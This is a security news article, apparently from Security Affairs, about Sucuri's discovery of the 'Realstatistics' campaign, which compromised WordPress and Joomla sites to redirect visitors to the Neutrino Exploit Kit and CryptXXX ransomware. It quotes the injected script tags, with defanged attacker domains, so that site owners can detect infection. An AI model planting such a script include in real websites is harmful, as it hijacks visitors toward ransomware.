Security experts from Sucuri security firm have spotted a new ransomware-based campaign dubbed ‘Realstatistics’ conducted by threat actors in the past two weeks.
“Our Incident Response Team (IRT) has been tracking a mass infection campaign over the last two weeks ( codenamed “Realstatistics“). This campaign has compromised thousands of websites built on the Joomla! and WordPress Content Management System (CMS).” states Sucuri in a blog post. “We have codenamed the campaign “Realstatistics” because of the domain being used by the attackers”
Experts estimated that over 2,000 websites running out-of-date CMSs have been already infected, and at least 100 new websites are infected every day.
The vast majority of the infected websites (90 percent) is running an older version of CMS platforms, 60% of them is based on WordPress and Joomla.
The experts discovered that threat actors are injecting the following fake analytics code into the PHP template of every compromised site:
<script language="JavaScript" src="http://realstatistics[.]info[/]js/analytic.php?id=4" <script language="JavaScript" src="http://realstatistics[.]pro[/]js/analytic.php?id=4"
The analysis of compromised websites revealed that threat actors behind the Realstatistics campaign are most likely exploiting vulnerabilities in plugins to hack them.
The domain realstatistics[.]info was the first spotted in the wild around June 9th, later on Jul 1st attackers switched on realstatistics[.]pro. Both domains are still being used by the attackers.
The researchers noticed that the malicious campaign redirects visitors to websites hosting the Neutrino Exploit Kit used to deliver the CryptXXX ransomware. Traffic hijacking is obtained by injecting a malicious JS script loaded from these two domains.
If you want to check if your website is infected use the Sucuri SiteCheck, or simply look for the fake analytics code reported above.
[adrotate banner=”9″]
(Security Affairs – Realstatistics campaign, ransomware)
Law enforcement operation codenamed 'Operation RapTor' led to the arrest of 270 dark web vendors…
A Chinese threat actor, tracked as UAT-6382, exploited a patched Trimble Cityworks flaw to deploy…
U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds a Samsung MagicINFO 9 Server vulnerability to its…
Signal implements new screen security on Windows 11, blocking screenshots by default to protect user…
Microsoft found 394,000 Windows systems talking to Lumma stealer controllers, a victim pool that included…
CISA warns Russia-linked group APT28 is targeting Western logistics and tech firms aiding Ukraine, posing…
This website uses cookies.
![](data:image/svg+xml;charset=utf-8,<svg height="286px" width="650px" xmlns="http://www.w3.org/2000/svg" version="1.1"/>)